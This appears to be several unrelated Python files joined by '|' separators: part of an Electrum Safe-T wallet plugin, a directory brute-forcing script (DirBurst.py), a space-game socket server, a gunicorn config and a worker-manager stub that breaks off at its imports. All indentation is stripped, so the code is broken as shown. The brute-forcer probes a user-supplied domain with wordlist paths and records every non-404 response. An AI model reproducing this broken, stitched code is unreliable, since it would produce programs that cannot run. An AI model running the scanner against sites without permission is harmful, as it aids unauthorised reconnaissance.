import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
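"""Convert the Electrum transaction inputs into Safe-T TxInputType messages."""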
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
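"""Convert the Electrum outputs into Safe-T TxOutputType messages; at most one change-branch output is sent by derivation path so the device can hide it from the user."""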
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
DirBurst.py
|
#!/usr/bin/env python3
import requests
import threading
import time
start = time.perf_counter()
class DirBust():
def get_domain(self): # function to prompt user for target domain.
print("[+] Enter the target domain. ")
self.target = input("[+] ")
return self.target
def get_wordlist(self): # get directory brute list from file.
file = open("wordlist.txt")
self.content = file.read()
self.directory_list = self.content.splitlines() #split in lines to brute one by one.
return self.directory_list
def __init__(self):
self.discovered_directory_paths = [] # list of discovered directory paths.
self.directory_paths = self.get_wordlist()
self.domain = self.get_domain()
self.threads = []
self.thread_count = self.get_threads()
def find_directory_paths(self):
# Each worker thread consumes paths from the shared list until it is empty.
# Popping (instead of iterating while mutating) keeps threads from retrying or skipping paths.
while self.directory_paths:
try:
directory_path = self.directory_paths.pop(0) # list.pop is atomic under the GIL
except IndexError: # another thread emptied the list first
break
path = f"https://{self.domain}/{directory_path}"
print("[+] Trying path : ", path)
try:
status = requests.get(path) # send a GET request to check whether the path exists.
except requests.ConnectionError: # connection failed, skip this path.
continue
if status.status_code != 404:
print("[+] Discovered URL : ", path)
self.discovered_directory_paths.append(path) # record the discovered path.
def save_to_file(self): # function to save output list to file.
with open("Discovered_Directory_paths.txt", "w") as outfile:
            for discovered_path in self.discovered_directory_paths:
                outfile.write(discovered_path + "\n")
def get_threads(self):
        print("[+] How many threads do you want to use? ")
self.thread_count = int(input("[+] "))
if (self.thread_count <= 0 or self.thread_count > 200):
            print("[+] Please enter a thread count between 1 and 200.")
exit()
else:
return self.thread_count
def run_threads(self):
for _ in range(self.thread_count):
t = threading.Thread(target = self.find_directory_paths)
t.start()
self.threads.append(t)
for thread in self.threads:
thread.join()
if __name__ == "__main__":
try:
DB = DirBust()
DB.run_threads()
DB.save_to_file()
except KeyboardInterrupt: #exit if keyboard interrupted.
print("\n[-] Keyboard interrupt Triggered. ")
finish = time.perf_counter()
print(f"[+] Finished in {round(finish-start, 2)} seconds. ")
|
server.py
|
import socket #for client connections
import select
import sys
import time
import math
import random
import struct
import threading
import os
from collections import deque as deque
import obj
import placement
from placement import Placement
from placement import Quat
import waitFramerate
import assetManifest
from hypercubeCollide import hypercol
framerate = 30.0
con_vel = 3.0/framerate #it takes a third of a second for binary input players to go from neutral to maximum control
collisionRules = [
[0, 1, 0, 0],#rings
[1, 1, 1, 1],#ships
[0, 1, 0, 1],#asteroids
#[0, 1, 1, 1],
[0, 1, 1, 0]#missiles
]
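# collisionRules is a symmetric boolean matrix indexed by collision class
# (0 = rings, 1 = ships, 2 = asteroids, 3 = missiles): a 1 means objects of those
# two classes are tested against each other. The loop below sanity-checks that the
# matrix is square and symmetric.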
cliInputs = deque()
collide = None
manifest = None
for ridx in range(len(collisionRules)):
r = collisionRules[ridx]
if len(r) != len(collisionRules):
print("Improper collision rules! Invalid row lengths")
for cidx in range(len(r)):
if r[cidx] != collisionRules[cidx][ridx]:
print("Improper collision rules! Not symmetric matrix")
class CliInput:
def __init__(self, cliId, msg):
self.id = cliId
self.msg = msg
def init():
global cliInputs, collide, manifest
#load model manifest
manifest = assetManifest.readManifest("assets/manifest3.json")
if manifest == None:
return
#start client listener
startNetworking()
#create collider object
collide = hypercol.Hypercol(3)#request a 3D collider
print("Process:",os.getpid())
for x in manifest["models"]:
collide.loadOClass(x['name'], "assets/nhc3/"+x['name']+".nhc3")
while True:
print("Starting new round")
setupNewRound()
roundResults = roundLoop()
print(roundResults)
time.sleep(1)#inter-round delay
collide = None
def setupNewRound():
Client.dieAll()
CommandPoint.removeAll()
Missile.removeAll()
obj.removeAll()
Team.clear()
Team("CYAN", (0.0, 1.0, 0.941, 1.0))
Team("MGTA", (1.0, 0.0, 0.941, 1.0))
for c in random.sample(list(Client.clients), len(Client.clients)):
c.team = Team.select()
for idx in range(10):
CommandPoint()
for idx in range(100):
asteroid = obj.OctObj(random.choice((3, 4, 6)), 2)
asteroid.pos.randomize(60000)
#Team("Yellow", (1.0, 0.941, 0))
def roundLoop():
global manifest, collide, framerate, clientLock
start = time.monotonic()
winner = None
#test_iterations = 100
test_iterations = -1
framecounter = 0
while (not winner) and test_iterations != 0:
framecounter = (framecounter+1)%framerate
#operations to do once per second
if framecounter == 0:
for c in Client.clients:
c.ping()
if test_iterations > 0:
test_iterations -= 1
clientLock.release()
if not test_iterations >= 0:
waitFramerate.waitFramerate(1/framerate)
clientLock.acquire()
#Handle client inputs
for hIdx in range(len(cliInputs)):
handleClientInput(cliInputs.pop())
#Find Collisions
myscene = collide.newScene(collisionRules)
collide.selectScene(myscene)
bscollidedict = dict()#FIXME
bscollideind = 0
for o in obj.objects.values():
if isinstance(o, obj.OctObj):
convcoord = [int(o.pos.loc[idx]/manifest['resolution']*2.0) for idx in range(3)]
pt = collide.createPoint(convcoord)
orient = collide.createOrientation(*o.pos.rot)
oinst = collide.newOInstance_o(o.collisionClass, pt, orient, manifest['models'][o.mid]['name'])
collide.addInstance(oinst)
bscollidedict[bscollideind] = o
bscollideind+=1
elif isinstance(o, obj.LineObj):
vec = o.offset[:]
placement.normalize(vec)
start = collide.createPoint([int((o.loc[idx] + vec[idx] * o.movement)/manifest['resolution']*2.0) for idx in range(3)])
offset = collide.createPoint([int(o.offset[idx]/manifest['resolution']*2.0) for idx in range(3)])
oinst = collide.newOInstance_l(o.collisionClass, start, offset)
collide.addInstance(oinst)
bscollidedict[bscollideind] = o
bscollideind+=1
else:
pass
#assert isinstance(o, obj.SphereObj)
collide.calculateScene()
c = collide.getCollisions()
collide.freeScene(myscene)
for o in obj.objects.values():
o.collisions.clear()
#if c[0] != 0:
# print("Got",c[0],"collisions")
for cIdx in range(c[0]):#first array element is the number of collisions
o1 = bscollidedict[c[1+2*cIdx]]
o2 = bscollidedict[c[2+2*cIdx]]
o1.collisions.add(o2)
o2.collisions.add(o1)
#Step Physics
commandObjKeys = CommandPoint.commandobjects.keys()
for m in Missile.missiles:
for col in m.obj.collisions:
if col.solid:
m.die()
break
m.step()
for c in Client.clients:
if c.obj == None:
continue
for col in c.obj.collisions:
if col.solid:
Client.chat(c.name+" died")
c.respawn(0)
if c.team != None:
c.team.award(-1000)
if col in commandObjKeys:
CommandPoint.commandobjects[col].capture(c.team)
for c in Client.clients:
if c.obj == None:
c.respawn(0)
c.applyControls()
Missile.cleanDead()
#Add commandpoint score
for t in Team.teams:
t.award(len(t.commandPoints))
if t.points > 10000:
winner = t
break
#Send Client Data
deadClients = set()
for c in Client.clients:
c.sendUpdate()
if c.dead:
deadClients.add(c)
for dc in deadClients:
print("Removing dead client")
dc.remove()
#sys.exit("exiting")
#end = time.monotonic()
#print(str(end-start))
    if winner:
        Client.chat("Team "+winner.name+" Wins!")
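# Client protocol summary (as implemented in Client.append / Client.send below):
# every message is a 4-byte big-endian length prefix followed by the payload, and
# the first 4 payload bytes name the command.
#   client -> server: CTRL (hex bitmask of held inputs; bit 0 fires a missile, the
#                     other bits drive yaw/pitch/roll/throttle in applyControls),
#                     ORNT (packed target-orientation quaternion),
#                     COMM (chat text, or a /command when it starts with '/'),
#                     RDEF (request an object definition by uid), plus PING/PONG.
#   server -> client: CONS (console/chat text), ASGN (assigned ship uid + turn rate),
#                     ODEF (object definition), FRME (per-frame world state), PING/PONG.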
def handleClientInput(i):
comm = i.msg[0:4]
rest = i.msg[4:]
cli = clientsById[i.id]
if comm == b'CTRL':
cli.control = int(rest, 16)
#print(str(i.id)+" controls: "+str(cli.control))
elif comm == b'ORNT':
cli.targetOrientation = Quat.netunpack(rest)
elif comm == b'COMM':
if len(rest) >= 1:
if rest[0] == ord('/'):
cli.runcommand(rest.decode('UTF-8').split())
else:
Client.chat(cli.name+": "+rest.decode('UTF-8'))
elif comm == b'RDEF':
uid = struct.unpack('!i', i.msg[4:])[0]
if uid in obj.objects.keys():
targ = obj.objects[uid]
cli.sendDef(targ)
else:
print("ignoring request for", uid)
else:
print("Unknown message from "+str(i.id)+": "+str(i.msg))
#Client stuff
cliNetThread = None
def startNetworking():
global cliNetThread, clientLock
clientLock.acquire()
cliSock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
cliSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cliSock.bind(("", 3131))
cliSock.listen()
cliNetThread = threading.Thread(group=None, target=cliNetThreadLoop, name="cliNetThread", args=(cliSock,))
cliNetThread.start()
class Team:
teams = []
netPackCache = None
def select():
if len(Team.teams) < 1:
return None
weakestTeam = Team.teams[0]
for t in Team.teams:
if t.members() < weakestTeam.members():
weakestTeam = t
return weakestTeam
def clear():
for x in Client.clients:
x.team = None
Team.teams = []
Team.netPackCache = None
print("Cleared Teams")
def scoreboard():
board = dict()
for t in Team.teams:
board[t.name] = t.points
return board
def getByName(n):
for t in Team.teams:
if t.name == n:
return t
return None
def netPack():
if not Team.netPackCache:
Team.netPackCache = struct.pack('!b', len(Team.teams))
for t in Team.teams:
Team.netPackCache += struct.pack('!i', t.points)
return Team.netPackCache
def __init__(self, name, color):
name = name.upper()
#team names ending in underscore are individual user teams for ffa
if Team.getByName(name):
uniqueSuffix = 2
while Team.getByName(name+"_"+str(uniqueSuffix)):
uniqueSuffix += 1
name = name+"_"+str(uniqueSuffix)
self.name = name
self.color = color
self.points = 0
self.commandPoints = set()
Team.teams.append(self)
def members(self):
ret = 0
for x in Client.clients:
if x.team == self:
ret+=1
return ret
def award(self, pts):
self.points += pts
Team.netPackCache = None
class Missile:
missiles = set()
deadMissiles = set()
def cleanDead():
for dm in Missile.deadMissiles:
dm.remove()
Missile.deadMissiles = set()
def __init__(self, originObj):
self.obj = obj.LineObj(3)
tempplacement = Placement()
tempplacement.copy(originObj.pos)
tempplacement.moveForward(0.75*manifest['models'][originObj.mid]['diameter'])
self.obj.loc = tempplacement.loc
diameter = manifest['models'][5]['diameter']
self.obj.offset = [int(x*diameter) for x in tempplacement.rot.forward()]
self.lifetime = int(3*framerate)
self.speed = int(manifest['models'][5]['speed']/framerate)
Missile.missiles.add(self)
def die(self):
Missile.deadMissiles.add(self)
def remove(self):
Missile.missiles.remove(self)
self.obj.remove()
def step(self):
self.lifetime -= 1
if self.lifetime <= 0:
self.die()
self.obj.movement += self.speed
def removeAll():
Missile.missiles = set()
Missile.deadMissiles = set()
class CommandPoint:
commandobjects = dict()
def __init__(self, objMid = 2, totemMid = 1, team=None):
totemColor = (0.9, 0.9, 0.9, 1.0)
self.team = team
if team != None:
totemColor = team.color
        # The obj is the capture box. The totem is an optional auxiliary solid marker
self.obj = obj.OctObj(objMid, 0, color=(0.5, 0.75, 1.0, 0.5), solid=False)
self.totem = obj.OctObj(totemMid, 0, color=totemColor, solid=True)
self.obj.pos.randomize(20000)
self.totem.pos = self.obj.pos
CommandPoint.commandobjects[self.obj] = self
def capture(self, team):
if self.team == team:
return
if self.team != None:
self.team.commandPoints.remove(self)
self.team = team
if self.team != None:
self.team.commandPoints.add(self)
self.totem.setColor(team.color)
def setLocation(self, p):
self.obj.pos.moveAbs(p)
self.totem.pos.moveAbs(p)
def removeAll():
CommandPoint.commandobjects = dict()
newCliId = 1
class Client:
clients = set()
def chat(msg):
for c in Client.clients:
c.sendmsg("CONS"+msg)
def __init__(self, soc):
global newCliId
self.soc = soc
self.id = newCliId
newCliId += 1
self.buf = bytes()
self.obj = None
self.control = 0
self.pitch = 0.0
self.yaw = 0.0
self.roll = 0.0
self.targetOrientation = Quat()
self.throttle = 0.0
self.dead = False
self.name = "client_"+str(self.id)
self.team = None
self.pingtime = 999 #ms
self.pingsenttime = None
self.setTeam(Team.select())
Client.clients.add(self)
def runcommand(self, tok):
print(self.name+' executing: '+' '.join(tok))
try:
for tidx in range(len(tok)):
tok[tidx] = tok[tidx].upper()
if tok[0] == '/NAME':
if(len(tok) < 2):
self.sendmsg('CONSBad /NAME usage.\nTry /HELP')
else:
self.name = tok[1]
self.obj.setName(self.name)
self.sendmsg('CONSName set: '+self.name)
elif tok[0] == '/LIST':
msg = "CONS"
for c in Client.clients:
msg += c.name+':'+c.team.name+","
self.sendmsg(msg)
elif tok[0] == '/HELP':
self.sendmsg("CONS/NAME <yourname>\n/LIST\n/TEAM [TEAMNAME]")
elif tok[0] == '/TEAM':
print("Token len:", len(tok))
if(len(tok) < 2):
if(self.team):
self.sendmsg("CONS"+self.team.name)
else:
teamname = tok[1]
myNewTeam = Team.getByName(teamname)
if(myNewTeam):
self.setTeam(myNewTeam)
self.sendmsg('CONSTeam set: '+self.team.name)
else:
self.sendmsg('CONSTeam not found.')
else:
self.sendmsg("CONSUnknown command: "+tok[0]+"\nTry /HELP")
except:
print("Caught otherwise unhandled client command exception \"",tok,"\"")
def respawn(self, modelId):
self.die()
color = (0.7, 0.5, 0.5)
if self.team != None:
color = self.team.color
self.obj = obj.OctObj(0, 1, color = color, name = self.name)
self.obj.pos.randomize(20000)
self.sendAsg()
def die(self):
if self.obj == None:
return
o = self.obj
self.obj = None
o.remove()
def dieAll():
for c in Client.clients:
c.die()
def append(self, data):
self.buf = self.buf+data
foundSomething = True
while foundSomething:
foundSomething = False
remainingLen = len(self.buf)
if(remainingLen < 4):
break
nextMsgLen = struct.unpack('!i', self.buf[:4])[0]
if remainingLen-4 >= nextMsgLen:
foundSomething = True
msg = self.buf[4:nextMsgLen+4]
if msg == b'PING':
self.pinghandle()
elif msg == b'PONG':
self.ponghandle()
else:
cliInputs.appendleft(CliInput(self.id, msg))
self.buf = self.buf[nextMsgLen+4:]
def setTeam(self, team):
if(self.team == team):
return
self.team = team
if(self.obj):
self.obj.setColor(team.color)
self.die()
def sendAsg(self):
if(self.obj):
self.send(b"ASGN" + struct.pack('!ih', self.obj.uid, int(manifest['models'][self.obj.mid]['turn']*100.0)))
def sendDef(self, o):
self.send(b"ODEF" + o.netDef())
def sendUpdate(self):
fMsg = [b"FRME", Team.netPack()]
octobj = list()
lineobj = list()
for o in obj.objects.values():
if isinstance(o, obj.OctObj):
octobj.append(o.netPack())
else:
assert isinstance(o, obj.LineObj)
lineobj.append(o.netPack())
fMsg.append(struct.pack('!i', len(octobj)))
fMsg += octobj
fMsg.append(struct.pack('!i', len(lineobj)))
fMsg += lineobj
self.send(b''.join(fMsg))
def sendmsg(self, msg):
self.send(msg.encode("UTF-8"))
def send(self, data):
try:
self.soc.sendall(len(data).to_bytes(4, byteorder='big')+data)
except Exception as e:
print("Socket failed to write")
self.ts_remove()
def ping(self):
self.send(b'PING')
self.pingsenttime = time.time()
def pinghandle(self):
self.send(b'PONG')
def ponghandle(self):
if self.pingsenttime:
self.pingtime = int(1000 * (time.time()-self.pingsenttime))
self.pingsenttime = None
def controlRange(targetValue, currentValue):
delta = targetValue-currentValue
return currentValue + max(-con_vel, min(con_vel, delta))
#return targetValue
def applyControls(self):
global framerate
if self.obj == None:
return
c = self.control
self.yaw = Client.controlRange(((c>>1)&1)-((c>>2)&1), self.yaw)
self.pitch = Client.controlRange(((c>>4)&1)-((c>>3)&1), self.pitch)
self.roll = Client.controlRange(((c>>7)&1)-((c>>5)&1), self.roll)
self.throttle = Client.controlRange(((c>>8)&1)-((c>>6)&1), self.throttle)
#print(str(self.throttle)+' '+str(self.yaw)+' '+str(self.pitch)+' '+str(self.roll))
posObj = self.obj.pos
maniModel = manifest['models'][self.obj.mid]
speed = maniModel['speed']/framerate
trange = maniModel['trange']#throttle position range information
if self.obj:
self.obj.pos.rot = Quat.slerp(self.obj.pos.rot, self.targetOrientation, t = 0.5, maxangle=manifest['models'][self.obj.mid]['turn']/framerate)
realthrottle = self.throttle
if self.throttle >= 0 :
realthrottle = trange[1]+(self.throttle*(trange[2]-trange[1]))
else:
realthrottle = trange[1]-(self.throttle*(trange[0]-trange[1]))
posObj.moveForward(realthrottle*speed)
if c & 1:#Missile
self.control &= ~1
Missile(self.obj)
def ts_remove(self):#thread-safe
self.dead = True
def remove(self):
self.die()
del clientsById[self.id]
del clientsBySoc[self.soc]
Client.clients.remove(self)
clientsBySoc = dict()
clientsById = dict()
selSocks = []
clientLock = threading.Lock()
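# Concurrency model: roundLoop() holds clientLock for the whole frame and releases it
# only around the per-frame sleep, while cliNetThreadLoop() below acquires it just long
# enough to register a newly accepted client. Per-client bytes are parsed in the network
# thread (Client.append) and queued on the cliInputs deque, which the round loop drains
# once per frame; Client.ts_remove() only sets a flag so actual removal happens in the
# round loop.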
def cliNetThreadLoop(soc):
global clientsBySoc, clientsById, selSocks, clientLock
selSocks.append(soc)
while True:
readable = select.select(selSocks,[],[])[0]
for r in readable:
if r is soc:
newCliSoc = r.accept()[0]
selSocks.append(newCliSoc)
print("trying to acquire lock")
clientLock.acquire()
newCli = Client(newCliSoc)
clientsBySoc[newCliSoc] = newCli
clientsById[newCli.id] = newCli
clientLock.release()
print("New Client: "+str(newCli.id)+" ("+str(len(selSocks))+" total)")
else:
c = clientsBySoc[r]
msg = b''
try:
msg = r.recv(4096);
except Exception as e:
print("Failed to read from client: "+str(c.id))
if len(msg) == 0:
print("Got Client disconnect: "+str(c.id))
selSocks.remove(r)
c.ts_remove()
else:
c.append(msg)
init()
|
gunicorn_conf.py
|
# Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Config file for gunicorn."""
import os
import time
import signal
import sys
import multiprocessing
import threading
from importlib import import_module
import psutil
import gunicorn
from mindinsight.utils.computing_resource_mgr import terminate
from mindinsight.debugger.session_manager import SessionManager
gunicorn.SERVER_SOFTWARE = 'unknown'
worker_class = 'sync'
workers = 1
threads = min(30, os.cpu_count() * 2 + 1)
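# 2 * CPU cores + 1 is the usual gunicorn sizing heuristic for worker threads; min() caps it at 30.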
worker_connections = 1000
timeout = 30
graceful_timeout = 30
daemon = False
captureoutput = False
# write gunicorn default log to devnull, and using mindinsight logger write gunicorn log to file.
accesslog = os.devnull
def on_starting(server):
"""Hook function on starting gunicorn process."""
hook_module = import_module('mindinsight.utils.hook')
for hook in hook_module.HookUtils.instance().hooks():
threading.Thread(target=hook.on_startup, args=(server.log,)).start()
# This global variable is to manage the listen process so that we can close the
# process when gunicorn is exiting.
LISTEN_PROCESS = None
def post_worker_init(worker):
"""
Launch a process to listen worker after gunicorn worker is initialized.
Children processes of gunicorn worker should be killed when worker has been killed
because gunicorn master murders this worker for some reasons such as worker timeout.
Args:
worker (ThreadWorker): worker instance.
"""
def murder_worker_children_processes():
signal.signal(
signal.SIGTERM,
lambda signal_num, handler: sys.exit(0))
processes_to_kill = []
# sleep 3 seconds so that all worker children processes have been launched.
time.sleep(3)
process = psutil.Process(worker.pid)
for child in process.children(recursive=True):
if child.pid != os.getpid():
processes_to_kill.append(child)
while True:
if os.getppid() != worker.pid:
# Kill the remaining sub-processed after the worker process died
_, alive = psutil.wait_procs(processes_to_kill, 0.1)
current_worker_pid = os.getppid()
for proc in alive:
worker.log.info("Original worker pid: %d, current worker pid: %d, stop process %d",
worker.pid, current_worker_pid, proc.pid)
try:
proc.send_signal(signal.SIGKILL)
except psutil.NoSuchProcess:
continue
except psutil.Error as ex:
worker.log.error("Stop process %d failed. Detail: %s.", proc.pid, str(ex))
worker.log.info("%d processes have been terminated by listener.", len(alive))
break
time.sleep(1)
listen_process = multiprocessing.Process(target=murder_worker_children_processes,
name="murder_worker_children_processes")
listen_process.start()
global LISTEN_PROCESS
LISTEN_PROCESS = listen_process
worker.log.info("Service start state: success.")
    worker.log.info("Server pid: %d, starting to listen.", worker.ppid)
def worker_int(worker):
"""Terminate child processes when worker is interrupted."""
terminate()
global LISTEN_PROCESS
if LISTEN_PROCESS is not None:
LISTEN_PROCESS.terminate()
SessionManager.get_instance().exit()
worker.log.info("Worker int processed.")
|
worker_manager.py
|
"""
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
from __future__ import print_function
from __future__ import division
# pylint: disable=invalid-name
# pylint: disable=abstract-class-not-used
# pylint: disable=abstract-class-little-used
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
import shutil
import time
try:
from sets import Set
except ImportError:
Set = set
# Local
from exd.exd_utils import EVAL_ERROR_CODE
